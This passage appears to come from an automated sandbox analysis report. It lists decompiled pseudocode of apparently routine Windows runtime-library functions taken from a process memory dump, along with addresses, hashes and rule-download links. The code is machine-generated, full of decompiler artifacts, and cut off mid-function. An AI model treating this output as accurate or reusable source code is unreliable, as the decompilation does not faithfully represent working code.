					L04BBDF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x4c57b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L04B84620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M04B9E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x04b9e730
0x04b9e736
0x04b9e738
0x04b9e73d
0x04b9e73e
0x04b9e740
0x04b9e749
0x04b9e765
0x04b9e76a
0x04b9e76b
0x04b9e76c
0x04b9e76d
0x04b9e76e
0x04b9e76f
0x04b9e775
0x04b9e777
0x04b9e77e
0x04bdb675
0x04b9e784
0x04b9e784
0x04b9e789
0x04b9e7a8
0x04b9e7ac
0x04b9e807
0x04b9e7ae
0x04b9e7ae
0x04b9e7b1
0x04b9e7b4
0x04b9e7b9
0x04b9e7c0
0x04b9e7c4
0x04b9e7ca
0x04b9e7cc
0x00000000
0x04b9e7d3
0x04b9e7d6
0x00000000
0x00000000
0x04b9e7ff
0x04b9e802
0x00000000
0x00000000
0x04b9e7f9
0x04b9e7fc
0x00000000
0x00000000
0x04b9e7f3
0x04b9e7f6
0x00000000
0x00000000
0x04b9e7ed
0x04b9e7f0
0x00000000
0x00000000
0x04b9e7e7
0x04b9e7ea
0x00000000
0x00000000
0x04bdb685
0x04bdb688
0x00000000
0x00000000
0x04bdb682
0x00000000
0x00000000
0x04b9e7cc
0x04b9e7d9
0x04b9e7dc
0x04b9e7de
0x04b9e7de
0x04b9e7ac
0x04b9e7e4
0x04b9e74b
0x04b9e751
0x04b9e759
0x04b9e761
0x04b9e761

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5932c3da0b02055f6c7ad85e46e1894d27deebbc41e372f35b4c2b25f1169828
Instruction ID: 055da22e3657e0dddd5fbde66ff3452229bedd6b426e2deaf8919e9859bea982
Opcode Fuzzy Hash: 5932c3da0b02055f6c7ad85e46e1894d27deebbc41e372f35b4c2b25f1169828
Instruction Fuzzy Hash: 4A316175A14249EFDB44CF58D841B96B7E4FB19314F1482A6F904CB381E635FD90CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04B9BC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E04B9BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x4c56100; // 0x16
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E04B82280(0xd, 0x17daf1a0);
				_t41 =  *0x4c560f8; // 0x0
				if(_t41 != 0) {
					 *0x4c560f8 =  *_t41;
					 *0x4c560fc =  *0x4c560fc + 0xffff;
				}
				E04B7FFB0(_t41, 0x800, 0x17daf1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x4c560f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L04B84620(0x4c56100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x4c56100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x04b9bc36
0x04b9bc42
0x04b9bc45
0x04b9bc4a
0x04b9bd35
0x00000000
0x00000000
0x00000000
0x00000000
0x04b9bc50
0x04b9bc50
0x04b9bc58
0x04b9bc5a
0x04b9bc60
0x00000000
0x00000000
0x04bda4f2
0x04bda4f6
0x00000000
0x00000000
0x00000000
0x04bda4fc
0x04b9bc79
0x04b9bc7e
0x04b9bc86
0x04b9bd16
0x04b9bd20
0x04b9bd20
0x04b9bc8d
0x04b9bc94
0x04b9bcbd
0x04b9bcca
0x04b9bccb
0x04b9bccc
0x04b9bccd
0x04b9bcce
0x04b9bcd4
0x04b9bcea
0x04b9bcee
0x04b9bcf2
0x04b9bd00
0x04b9bd04
0x00000000
0x04b9bc96
0x04b9bcab
0x04b9bcaf
0x04b9bd2c
0x04b9bd2c
0x04b9bd09
0x00000000
0x04b9bd09
0x04b9bcb1
0x04b9bcb5
0x04b9bcbb
0x00000000
0x00000000
0x00000000
0x04b9bcbb

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cecbf77b0d68b974b634f3ec5ffe49e7656344e0066bfe53a60613dac614a98
Instruction ID: 891ff2c80e388df71829f07968c590dad6cb5b411b306a92abdf7ad911088ef2
Opcode Fuzzy Hash: 3cecbf77b0d68b974b634f3ec5ffe49e7656344e0066bfe53a60613dac614a98
Instruction Fuzzy Hash: 8B31EE3A6046159BDF01EF68E4807AA73B8FF58314F4400B8EC48EB201EA78FD859B84

Uniqueness

Uniqueness Score: -1.00%

Function 04B91DB5, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E04B91DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E04B8F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L04B84620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E04B8F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x04b91dc2
0x04b91dc5
0x04b91dc7
0x04b91dcc
0x04b91dce
0x04b91dd6
0x04b91ddf
0x04b91de0
0x04b91de1
0x04b91de5
0x04b91de8
0x04b91def
0x04b91df0
0x04b91df6
0x04b91df7
0x04b91dfe
0x04b91e1a
0x00000000
0x00000000
0x04b91e0b
0x04b91e12
0x04b91e12
0x04b91e00
0x04b91e00
0x04b91e05
0x04b91e1e
0x04b91e23
0x04bd570f
0x04bd5713
0x00000000
0x00000000
0x04bd5719
0x04bd5719
0x04b91e2c
0x04b91e2d
0x04b91e2e
0x04b91e2f
0x04b91e31
0x04b91e32
0x04b91e35
0x04b91e3d
0x04bd5723
0x04bd573d
0x04bd573d
0x00000000
0x04bd5723
0x04b91e49
0x04b91e4e
0x04b91e4e
0x04b91e09
0x00000000

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: 0b2dde081102705829fd3cacdf010e3a3e40606396f95029cf628b82fc8d42f5
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 4321717160051AFFEB21DF9DCC80E6ABBBDEF85744F1544A5E50597210DA34BD01D790

Uniqueness

Uniqueness Score: -1.00%

Function 04B69100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E04B69100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x4c3f6e8);
				E04BBD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E04C388F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E04BBD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x4c586c0; // 0xa907b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x4c586b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E04B82280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E04C388F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E04BAAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x4c5b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x4c584c0;
										if(_t69 >=  *0x4c584c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E04C39063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E04B6922A(_t82);
							_t53 = E04B87D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E04C38B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x4c586c0; // 0xa907b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x4c586b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x4c586bc;
										_t72 = 0x4c586b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E04B69240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x4c586c4;
									_t72 = 0x4c586c0;
									L18:
									E04B99B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x04b69100
0x04b69100
0x04b69100
0x04b69100
0x04b69102
0x04b69107
0x04b6910c
0x04b69110
0x04b69115
0x04b69136
0x04b69143
0x04bc37e4
0x04bc37e4
0x04b69149
0x04b6914e
0x04b6914e
0x04b69117
0x04b6911d
0x00000000
0x00000000
0x04b6911f
0x04b69125
0x00000000
0x04b69151
0x04b69158
0x04b6915d
0x04b69161
0x04b69168
0x04bc3715
0x00000000
0x04b6916e
0x04b6916e
0x04b69175
0x04b69177
0x04b6917e
0x04b6917f
0x04b69182
0x04b69182
0x04b69187
0x04b69187
0x04b6918a
0x04b6918d
0x04b6918f
0x04b69192
0x04b69195
0x04b69198
0x04b69198
0x04b69198
0x04b6919a
0x00000000
0x00000000
0x04bc371f
0x04bc3721
0x04bc3727
0x04bc372f
0x04bc3733
0x04bc3735
0x04bc3738
0x04bc373b
0x04bc373d
0x04bc3740
0x00000000
0x00000000
0x04bc3746
0x04bc3749
0x00000000
0x00000000
0x04bc374f
0x04bc3751
0x00000000
0x00000000
0x04bc3757
0x04bc3759
0x04bc375c
0x04bc375c
0x04bc375e
0x04bc375e
0x04bc3761
0x04bc3764
0x00000000
0x00000000
0x04bc3766
0x04bc3768
0x04bc37a3
0x04bc37a3
0x04bc37a5
0x04bc37a7
0x04bc37ad
0x04bc37b0
0x04bc37b2
0x04bc37bc
0x04bc37c2
0x04bc37c2
0x04bc37b2
0x04b69187
0x04b69187
0x04b6918a
0x04b6918d
0x04b6918f
0x04b69192
0x04b69195
0x00000000
0x04b69195
0x00000000
0x04b69187
0x04bc376a
0x04bc376a
0x04bc376c
0x04bc376c
0x04bc376f
0x04bc3775
0x00000000
0x00000000
0x04bc3777
0x04bc3779
0x00000000
0x00000000
0x04bc3782
0x04bc3787
0x04bc3789
0x04bc3790
0x04bc3790
0x04bc378b
0x04bc378b
0x04bc378b
0x04bc3792
0x04bc3795
0x04bc3795
0x04bc3798
0x04bc3798
0x04bc379b
0x04bc379b
0x04b691a3
0x04b691a9
0x04b691b0
0x04b691b4
0x04b691b4
0x04b691bb
0x04b691c0
0x04b691c5
0x04b691c7
0x04bc37da
0x04b691cd
0x04b691cd
0x04b691cd
0x04b691d2
0x04b691d5
0x04b69239
0x04b69239
0x04b691d7
0x04b691db
0x04b691e1
0x04b691e7
0x04b691fd
0x04b69203
0x04b6921e
0x04b69223
0x00000000
0x04b69223
0x04b69205
0x04b69208
0x04b6920c
0x04b69214
0x04b69214
0x04b691e9
0x04b691e9
0x04b691ee
0x04b691f3
0x04b691f3
0x04b691f3
0x04b691e7
0x00000000
0x04b691db
0x04b69187
0x04b69168

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b5345c8b1137aab2016e204e4657abe32fe2004a3f0c53c2daf2e3d2019c024
Instruction ID: 497abac6c860955a47ca0ff8265df7afe7be194100a6d5eb7b6d21c0d6e27943
Opcode Fuzzy Hash: 2b5345c8b1137aab2016e204e4657abe32fe2004a3f0c53c2daf2e3d2019c024
Instruction Fuzzy Hash: 233192B5A01245EFEB25EF68C588BACB7F1FB48714F2485DAC40667240D738B990CF61

Uniqueness

Uniqueness Score: -1.00%

Function 04B80050, Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04B80050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x4c5d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E04B99ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E04BAB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E04C38A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E04B99702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x4c5b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x04b80055
0x04b8005d
0x04b80062
0x04b8006c
0x04b8006f
0x04b80074
0x04b8007a
0x04b8007a
0x04b80080
0x04b80080
0x04b80087
0x04b8008d
0x04b8008f
0x04b80093
0x04b80095
0x04b8009b
0x04b800f8
0x04b800fb
0x04b800fc
0x04b800ff
0x04b80108
0x04b80108
0x04b800a2
0x04b800a6
0x04b800b3
0x04b800bc
0x04b800c5
0x04b800ca
0x04bcc01e
0x00000000
0x00000000
0x04bcc02d
0x04b800d5
0x04b800d9
0x04bcc03d
0x04bcc046
0x04bcc046
0x04b800df
0x04b800e2
0x04b800ea
0x04b800ef
0x04b800f2
0x04b800f6
0x04b80111
0x04b80117
0x04b80117
0x00000000
0x04b800f6
0x04b800d0
0x04b800d0
0x00000000

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49eff7f19351697079b8c2cc52c4daffc4071519b113972eb1287d9d95868842
Instruction ID: c2396ee5e258d2e12993fbe55f941b3c45e149f7384f749a713d9cad7c22c33e
Opcode Fuzzy Hash: 49eff7f19351697079b8c2cc52c4daffc4071519b113972eb1287d9d95868842
Instruction Fuzzy Hash: A3318C31601B048FD725EF28C840B9AB7E5FF88758F1545ADE49A87B90EB35BC05DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04BE6C0A, Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E04BE6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E04B87D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x4c57b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L04B84620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E04BAF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E04B87D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E04BA9AE0();
						_t23 = L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x04be6c0a
0x04be6c0f
0x04be6c10
0x04be6c13
0x04be6c15
0x04be6c19
0x04be6c1c
0x04be6c21
0x04be6c28
0x04be6c3a
0x04be6c2a
0x04be6c33
0x04be6c33
0x04be6c3f
0x04be6c48
0x04be6c4d
0x04be6c60
0x04be6c65
0x04be6c69
0x04be6c73
0x04be6c79
0x04be6c7f
0x04be6c86
0x04be6c90
0x04be6c94
0x04be6ca6
0x04be6cb2
0x04be6cbd
0x04be6cbd
0x04be6cc3
0x04be6cc7
0x04be6ccb
0x04be6cd0
0x04be6cd1
0x04be6ce2
0x04be6ce2
0x04be6c69
0x04be6ced

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8a8bf3f1d21d5a5ecdaa3d844eb7158b6b13f504e1ad35f179e5eeeed090c4f
Instruction ID: 0f9251d80d70572e0f54905823ba180d9669341e9e4c4f8f08fbb37cd1077f0a
Opcode Fuzzy Hash: f8a8bf3f1d21d5a5ecdaa3d844eb7158b6b13f504e1ad35f179e5eeeed090c4f
Instruction Fuzzy Hash: 5F217AB1A00644ABD715DB6AD880E6AB7A8FF48744F1400AAF904D7791EB34ED51CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 04BA90AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E04BA90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E04BBD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E04B9E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L04B84620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E04BAF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E04B9A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
